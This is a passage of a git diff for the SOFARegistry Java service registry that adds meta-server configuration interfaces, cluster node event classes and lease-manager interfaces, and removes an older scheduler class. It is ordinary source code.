this.metaSchedulerPoolSize = metaSchedulerPoolSize; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/NodeConfig.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/NodeConfig.java new file mode 100644 index 000000000..c6bc9ed38 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/NodeConfig.java @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.bootstrap.config; + +import java.util.Collection; +import java.util.Map; +import java.util.Set; + +/** + * @author shangyu.wh + * @version $Id: NodeConfig.java, v 0.1 2018-01-23 15:00 shangyu.wh Exp $ + */ +public interface NodeConfig { + + /** + * get other metaServer node + * + * @return + */ + Map> getMetaNode(); + + /** + * get other metaServer node ip + * + * @return + */ + Map> getMetaNodeIP(); + + /** + * local data Center id + * + * @return + */ + String getLocalDataCenter(); + + /** + * get dataCenter by meta node ipAddress + * + * @param metaIpAddress + * @return + */ + String getMetaDataCenter(String metaIpAddress); + + /** + * get datacenter meta servers + * + * @param dataCenter + * @return + */ + Set getDataCenterMetaServers(String dataCenter); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/NodeConfigBeanProperty.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/NodeConfigBeanProperty.java new file mode 100644 index 000000000..72815389b --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/NodeConfigBeanProperty.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.bootstrap.config; + +import java.util.Collection; +import java.util.Map; +import org.springframework.beans.factory.annotation.Value; + +/** + * @author shangyu.wh + * @version $Id: NodeConfigBeanProperty.java, v 0.1 2018-05-03 16:21 shangyu.wh Exp $ + */ +public class NodeConfigBeanProperty extends AbstractNodeConfigBean { + + @Value("#{PropertySplitter.mapOfList('${nodes.metaNode}')}") + private Map> metaNode; + + @Value("${nodes.localDataCenter}") + private String localDataCenter; + + @Override + public Map> getMetaNode() { + return metaNode; + } + + /** + * Getter method for property localDataCenter. + * + * @return property value of localDataCenter + */ + @Override + public String getLocalDataCenter() { + return localDataCenter; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/NodeCluster.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/NodeCluster.java new file mode 100644 index 000000000..53b4593de --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/NodeCluster.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.cluster.Cluster; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public interface NodeCluster extends Cluster { + + VersionedList getClusterMeta(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/RemoteServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/RemoteServer.java new file mode 100644 index 000000000..608f3bf83 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/RemoteServer.java @@ -0,0 +1,28 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster; + +import com.alipay.sofa.registry.common.model.Node; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public interface RemoteServer { + + T getRemoteNode(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/RemoteServers.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/RemoteServers.java new file mode 100644 index 000000000..8056574ba --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/RemoteServers.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster; + +import com.alipay.sofa.registry.common.model.Node; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public interface RemoteServers {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/AbstractNodeEvent.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/AbstractNodeEvent.java new file mode 100644 index 000000000..5ee8ada91 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/AbstractNodeEvent.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster.node; + +import com.alipay.sofa.registry.common.model.Node; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +public abstract class AbstractNodeEvent implements NodeEvent { + + private final T node; + + public AbstractNodeEvent(T node) { + this.node = node; + } + + public T getNode() { + return node; + } + + @Override + public String toString() { + return getClass().getSimpleName() + "{" + "node=" + node + '}'; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeAdded.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeAdded.java new file mode 100644 index 000000000..d727652a2 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeAdded.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster.node; + +import com.alipay.sofa.registry.common.model.Node; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +public class NodeAdded extends AbstractNodeEvent { + + public NodeAdded(T node) { + super(node); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeEvent.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeEvent.java new file mode 100644 index 000000000..20ac05979 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeEvent.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster.node; + +import com.alipay.sofa.registry.common.model.Node; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +public interface NodeEvent {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeModified.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeModified.java new file mode 100644 index 000000000..df4f17802 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeModified.java @@ -0,0 +1,41 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster.node; + +import com.alipay.sofa.registry.common.model.Node; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +public class NodeModified implements NodeEvent { + + private final T oldNode, newNode; + + public NodeModified(T oldNode, T newNode) { + this.oldNode = oldNode; + this.newNode = newNode; + } + + public T getOldNode() { + return oldNode; + } + + public T getNewNode() { + return newNode; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeRemoved.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeRemoved.java new file mode 100644 index 000000000..eeed2c676 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/cluster/node/NodeRemoved.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.cluster.node; + +import com.alipay.sofa.registry.common.model.Node; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +public class NodeRemoved extends AbstractNodeEvent { + + public NodeRemoved(T node) { + super(node); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/executor/ExecutorManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/executor/ExecutorManager.java deleted file mode 100644 index 044572398..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/executor/ExecutorManager.java +++ /dev/null @@ -1,182 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.executor; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import com.alipay.sofa.registry.server.meta.remoting.MetaClientExchanger; -import com.alipay.sofa.registry.server.meta.remoting.RaftExchanger; -import com.alipay.sofa.registry.task.scheduler.TimedSupervisorTask; -import com.alipay.sofa.registry.util.NamedThreadFactory; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.concurrent.ScheduledExecutorService; -import java.util.concurrent.ScheduledThreadPoolExecutor; -import java.util.concurrent.SynchronousQueue; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: ExecutorManager.java, v 0.1 2018-01-16 15:51 shangyu.wh Exp $ - */ -public class ExecutorManager { - - private ScheduledExecutorService scheduler; - - private ThreadPoolExecutor heartbeatCheckExecutor; - - private ThreadPoolExecutor checkDataChangeExecutor; - - private ThreadPoolExecutor getOtherDataCenterChangeExecutor; - - private ThreadPoolExecutor connectMetaServerExecutor; - - private ThreadPoolExecutor checkNodeListChangePushExecutor; - - private ThreadPoolExecutor raftClientRefreshExecutor; - - private MetaServerConfig metaServerConfig; - - @Autowired - private Registry metaServerRegistry; - - @Autowired - private MetaClientExchanger metaClientExchanger; - - @Autowired - private RaftExchanger raftExchanger; - - /** - * constructor - * @param metaServerConfig - */ - public ExecutorManager(MetaServerConfig metaServerConfig) { - this.metaServerConfig = metaServerConfig; - } - - public void init() { - - scheduler = new ScheduledThreadPoolExecutor(6, new NamedThreadFactory("MetaScheduler")); - - heartbeatCheckExecutor = new ThreadPoolExecutor(1, 2, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("MetaScheduler-HeartbeatCheck")); - - checkDataChangeExecutor = new ThreadPoolExecutor(1, 2, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("MetaScheduler-CheckDataChange")); - - getOtherDataCenterChangeExecutor = new ThreadPoolExecutor(1, 2, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory( - "MetaScheduler-GetOtherDataCenterChange")); - - connectMetaServerExecutor = new ThreadPoolExecutor(1, 2, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("MetaScheduler-ConnectMetaServer")); - - checkNodeListChangePushExecutor = new ThreadPoolExecutor(1, 4, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory( - "MetaScheduler-CheckNodeListChangePush")); - - raftClientRefreshExecutor = new ThreadPoolExecutor(1, 1, 0, TimeUnit.SECONDS, - new SynchronousQueue<>(), new NamedThreadFactory("MetaScheduler-RaftClientRefresh")); - } - - public void startScheduler() { - - init(); - - scheduler.schedule( - new TimedSupervisorTask("HeartbeatCheck", scheduler, heartbeatCheckExecutor, - metaServerConfig.getSchedulerHeartbeatTimeout(), TimeUnit.SECONDS, - metaServerConfig.getSchedulerHeartbeatExpBackOffBound(), - () -> metaServerRegistry.evict()), - metaServerConfig.getSchedulerHeartbeatFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule(new TimedSupervisorTask("GetOtherDataCenterChange", scheduler, - getOtherDataCenterChangeExecutor, metaServerConfig.getSchedulerGetDataChangeTimeout(), - TimeUnit.SECONDS, metaServerConfig.getSchedulerGetDataChangeExpBackOffBound(), - () -> { - metaServerRegistry.getOtherDataCenterNodeAndUpdate(NodeType.DATA); - metaServerRegistry.getOtherDataCenterNodeAndUpdate(NodeType.META); - }), - metaServerConfig.getSchedulerGetDataChangeFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("ConnectMetaServer", scheduler, connectMetaServerExecutor, - metaServerConfig.getSchedulerConnectMetaServerTimeout(), TimeUnit.SECONDS, - metaServerConfig.getSchedulerConnectMetaServerExpBackOffBound(), - () -> metaClientExchanger.connectServer()), - metaServerConfig.getSchedulerConnectMetaServerFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("CheckSessionNodeListChangePush", scheduler, - checkNodeListChangePushExecutor, - metaServerConfig.getSchedulerCheckNodeListChangePushTimeout(), TimeUnit.SECONDS, - metaServerConfig.getSchedulerCheckNodeListChangePushExpBackOffBound(), - () -> metaServerRegistry.pushNodeListChange(NodeType.SESSION)), - metaServerConfig.getSchedulerCheckNodeListChangePushFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("CheckDataNodeListChangePush", scheduler, - checkNodeListChangePushExecutor, - metaServerConfig.getSchedulerCheckNodeListChangePushTimeout(), TimeUnit.SECONDS, - metaServerConfig.getSchedulerCheckNodeListChangePushExpBackOffBound(), - () -> metaServerRegistry.pushNodeListChange(NodeType.DATA)), - metaServerConfig.getSchedulerCheckNodeListChangePushFirstDelay(), TimeUnit.SECONDS); - - scheduler.schedule( - new TimedSupervisorTask("RaftClientRefresh", scheduler, - raftClientRefreshExecutor, - metaServerConfig.getSchedulerCheckNodeListChangePushTimeout(), TimeUnit.SECONDS, - metaServerConfig.getSchedulerCheckNodeListChangePushExpBackOffBound(), - () -> raftExchanger.refreshRaftClient()), - metaServerConfig.getSchedulerCheckNodeListChangePushFirstDelay(), TimeUnit.SECONDS); - - } - - public void stopScheduler() { - if (scheduler != null && !scheduler.isShutdown()) { - scheduler.shutdown(); - } - - if (heartbeatCheckExecutor != null && !heartbeatCheckExecutor.isShutdown()) { - heartbeatCheckExecutor.shutdown(); - } - - if (checkDataChangeExecutor != null && !checkDataChangeExecutor.isShutdown()) { - checkDataChangeExecutor.shutdown(); - } - - if (connectMetaServerExecutor != null && !connectMetaServerExecutor.isShutdown()) { - connectMetaServerExecutor.shutdown(); - } - - if (getOtherDataCenterChangeExecutor != null - && !getOtherDataCenterChangeExecutor.isShutdown()) { - getOtherDataCenterChangeExecutor.shutdown(); - } - - if (checkNodeListChangePushExecutor != null) { - checkNodeListChangePushExecutor.isShutdown(); - } - - if (raftClientRefreshExecutor != null) { - raftClientRefreshExecutor.isShutdown(); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/Evictable.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/Evictable.java new file mode 100644 index 000000000..3e3b744f4 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/Evictable.java @@ -0,0 +1,27 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease; + +/** + * @author chen.zhu + *

Mar 09, 2021 + */ +public interface Evictable { + + /** Evict. */ + void evict(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/LeaseFilter.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/LeaseFilter.java new file mode 100644 index 000000000..785b28dc9 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/LeaseFilter.java @@ -0,0 +1,29 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.Lease; + +/** + * @author chen.zhu + *

Mar 18, 2021 + */ +public interface LeaseFilter { + + boolean allowSelect(Lease lease); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/LeaseManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/LeaseManager.java new file mode 100644 index 000000000..283d445f8 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/LeaseManager.java @@ -0,0 +1,53 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; + +/** + * @author chen.zhu + *

Nov 19, 2020 + */ +public interface LeaseManager { + + /** + * Renew Lease. Return true if the renewal has been existed and renew works Return false if the + * renewal is a new entry, we have to register it insteadof renew it + * + * @param renewal the renewal + * @param leaseDuration the lease duration + * @return the boolean + */ + boolean renew(T renewal, int leaseDuration); + + /** + * Gets get lease. + * + * @param renewal the renewal + * @return the get lease + */ + Lease getLease(T renewal); + + /** + * Gets get lease meta. + * + * @return the get lease meta + */ + VersionedList> getLeaseMeta(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DataManagerObserver.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DataManagerObserver.java new file mode 100644 index 000000000..308bfd2da --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DataManagerObserver.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.data; + +import com.alipay.sofa.registry.observer.UnblockingObserver; + +/** + * @author chen.zhu + *

Dec 15, 2020 + */ +public interface DataManagerObserver extends UnblockingObserver {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DataServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DataServerManager.java new file mode 100644 index 000000000..fc6a59479 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DataServerManager.java @@ -0,0 +1,55 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.data; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.lifecycle.Lifecycle; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.server.meta.lease.LeaseManager; +import com.alipay.sofa.registry.server.meta.monitor.data.DataMessageListener; +import com.alipay.sofa.registry.server.meta.monitor.data.DataServerStats; +import java.util.List; + +/** + * @author chen.zhu + *

Nov 19, 2020 + */ +public interface DataServerManager + extends Lifecycle, Observable, LeaseManager, DataMessageListener { + + /** + * Gets get data servers stats. + * + * @return the get data servers stats + */ + List getDataServersStats(); + + /** + * Gets get data server meta info. + * + * @return the get data server meta info + */ + VersionedList getDataServerMetaInfo(); + + /** + * Gets get epoch. + * + * @return the get epoch + */ + long getEpoch(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DefaultDataServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DefaultDataServerManager.java new file mode 100644 index 000000000..e863be280 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/lease/data/DefaultDataServerManager.java @@ -0,0 +1,208 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.lease.data; + +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeAdded; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeRemoved; +import com.alipay.sofa.registry.server.meta.lease.impl.AbstractEvictableFilterableLeaseManager; +import com.alipay.sofa.registry.server.meta.monitor.Metrics; +import com.alipay.sofa.registry.server.meta.monitor.data.DataServerStats; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.Collections; +import java.util.List; +import java.util.Map; +import javax.annotation.PostConstruct; +import javax.annotation.PreDestroy; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

